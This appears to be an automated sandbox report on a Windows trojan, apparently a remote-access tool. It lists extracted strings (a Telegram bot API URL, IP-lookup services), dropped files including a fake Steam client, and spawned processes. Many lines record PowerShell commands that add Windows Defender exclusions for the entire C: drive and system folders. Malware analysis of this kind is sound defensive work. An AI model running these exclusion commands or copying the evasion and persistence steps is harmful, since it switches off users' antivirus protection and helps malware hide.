                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 30 Nov 2024 03:28:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uw1eIJoYqm4R4zbg4HK0l8JwYdTl34kT4RzWnZxqHO3cuXVLi2cfhSJs%2Fu0cEaoSbkeEIoqxycsdJwpihcZ3OwvIFoD8Q3kOKWtdPFwqSwFovAJR9GB%2FVDKwigGeiP0h5AfN5BxVlA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ea7bf5fdfb74331-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=91093&min_rtt=56596&rtt_var=45864&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=644&delivery_rate=25796&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                    Source: powershell.exe, 0000001B.00000002.1983650675.0000018780225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000004.00000002.1989099278.0000017D00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2050478249.0000023794EB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2093877533.00000232DF4EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1989482663.0000020B00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2062197023.0000019AA86FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2061175203.000001D29F7B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2033046125.0000029B28865000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1989487871.000002B600347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1996250777.000001D549428000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2054374422.000002E5E4F96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2064130669.0000015044507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2103124929.0000026A8BB78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2053252505.000002DB27908000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1983650675.0000018780225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1989099278.0000017D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2050478249.0000023794C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2093877533.00000232DF1B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1989482663.0000020B00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2062197023.0000019AA84B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2061175203.000001D29F591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2033046125.0000029B28641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1989487871.000002B600121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1996250777.000001D549201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2054374422.000002E5E4D7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2064130669.00000150442E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2103124929.0000026A8B962000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2053252505.000002DB276E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1983650675.0000018780001000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.0000000002E8C000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000036.00000002.2527567041.0000000002A2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000004.00000002.1989099278.0000017D00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2050478249.0000023794EB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2093877533.00000232DF4EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1989482663.0000020B00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2062197023.0000019AA86FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2061175203.000001D29F7B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2033046125.0000029B28865000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1989487871.000002B600347000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1996250777.000001D549428000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2054374422.000002E5E4F96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2064130669.0000015044507000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2103124929.0000026A8BB78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2053252505.000002DB27908000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1983650675.0000018780225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 0000001B.00000002.1983650675.0000018780225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000004.00000002.1989099278.0000017D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2050478249.0000023794C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2093877533.00000232DF1B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1989482663.0000020B00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2062197023.0000019AA84B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2061175203.000001D29F591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2033046125.0000029B28641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1989487871.000002B600121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1996250777.000001D549201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2054374422.000002E5E4D7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2064130669.00000150442E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2103124929.0000026A8B962000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2053252505.000002DB276E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1983650675.0000018780001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.2229710923.000000001B6E2000.00000002.00000001.01000000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002DCD000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.00000000027DA000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000029E3000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000027BA000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000032.00000002.2396208828.00000000031FC000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000032.00000002.2396208828.000000000301A000.00000004.00000800.00020000.00000000.sdmp, IsFPfNCu.log.0.dr, GeNRoyLy.log.63.dr, ITtzBsaM.log.58.dr, BwVbAMfc.log.54.dr, PXvpYVwJ.log.50.dr, VHHMJZBT.log.36.drString found in binary or memory: https://api.telegram.org/bot
                    Source: powershell.exe, 0000001B.00000002.1983650675.0000018780225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.2229710923.000000001B6E2000.00000002.00000001.01000000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002DCD000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.00000000027DA000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000029E3000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000027BA000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000032.00000002.2396208828.00000000031FC000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000032.00000002.2396208828.000000000301A000.00000004.00000800.00020000.00000000.sdmp, IsFPfNCu.log.0.dr, GeNRoyLy.log.63.dr, ITtzBsaM.log.58.dr, BwVbAMfc.log.54.dr, PXvpYVwJ.log.50.dr, VHHMJZBT.log.36.drString found in binary or memory: https://ipinfo.io/country
                    Source: qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.2229710923.000000001B6E2000.00000002.00000001.01000000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002DCD000.00000004.00000800.00020000.00000000.sdmp, qNdO4D18CF.exe, 00000000.00000002.1760434359.00000000027DA000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000029E3000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000024.00000002.1977711443.00000000027BA000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000032.00000002.2396208828.00000000031FC000.00000004.00000800.00020000.00000000.sdmp, steamclient.exe, 00000032.00000002.2396208828.000000000301A000.00000004.00000800.00020000.00000000.sdmp, IsFPfNCu.log.0.dr, GeNRoyLy.log.63.dr, ITtzBsaM.log.58.dr, BwVbAMfc.log.54.dr, PXvpYVwJ.log.50.dr, VHHMJZBT.log.36.drString found in binary or memory: https://ipinfo.io/ip
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCA9DA535D810450AA35B2C9F27DA16D.TMPJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCA9DA535D810450AA35B2C9F27DA16D.TMPJump to behavior
                    Source: C:\Program Files (x86)\Steam\steamclient.exeCode function: 47_2_00007FFD9B8AE24147_2_00007FFD9B8AE241
                    Source: C:\Program Files (x86)\Steam\steamclient.exeCode function: 47_2_00007FFD9B8AE27547_2_00007FFD9B8AE275
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AFZZLiTQ.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                    Source: UUoNBnsb.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: KgJXRbxs.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: BCBhhiiL.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: rThRxFce.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: ZHGMdjIP.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: GpTgJexz.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: nYgAqZmk.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: dpMkGxhC.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: NnHgmtso.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: BuRPCyHG.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: tyOaygFf.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: AFZZLiTQ.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                    Source: qNdO4D18CF.exe, 00000000.00000000.1659101551.0000000000234000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs qNdO4D18CF.exe
                    Source: qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002DE3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs qNdO4D18CF.exe
                    Source: qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002CFB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs qNdO4D18CF.exe
                    Source: qNdO4D18CF.exe, 00000000.00000002.2229710923.000000001B6E2000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs qNdO4D18CF.exe
                    Source: qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002DCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs qNdO4D18CF.exe
                    Source: qNdO4D18CF.exe, 00000000.00000002.1760434359.00000000027DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs qNdO4D18CF.exe
                    Source: qNdO4D18CF.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs qNdO4D18CF.exe
                    Source: qNdO4D18CF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: qNdO4D18CF.exeStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                    Source: steamclient.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.001953125
                    Source: UUoNBnsb.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: KgJXRbxs.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: BCBhhiiL.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: rThRxFce.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: ZHGMdjIP.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: GpTgJexz.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: nYgAqZmk.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: dpMkGxhC.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: BuRPCyHG.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: tyOaygFf.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: AFZZLiTQ.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@78/211@1/1
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Program Files (x86)\SteamJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\Desktop\tyOaygFf.logJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-fY24BCTn2G7c5zMk36ds
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3868:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8212:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8812:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile created: C:\Users\user\AppData\Local\Temp\rmvercvhJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XyagYCCOZX.bat"
                    Source: qNdO4D18CF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: qNdO4D18CF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Program Files (x86)\Steam\steamclient.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: qNdO4D18CF.exeReversingLabs: Detection: 68%
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile read: C:\Users\user\Desktop\qNdO4D18CF.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\qNdO4D18CF.exe "C:\Users\user\Desktop\qNdO4D18CF.exe"
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA90.tmp" "c:\Windows\System32\CSCA9DA535D810450AA35B2C9F27DA16D.TMP"
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Steam\steamclient.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qNdO4D18CF.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XyagYCCOZX.bat"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: unknownProcess created: C:\Program Files (x86)\Steam\steamclient.exe "C:\Program Files (x86)\Steam\steamclient.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknownProcess created: C:\Users\user\Desktop\qNdO4D18CF.exe "C:\Users\user\Desktop\qNdO4D18CF.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Steam\steamclient.exe "C:\Program Files (x86)\Steam\steamclient.exe"
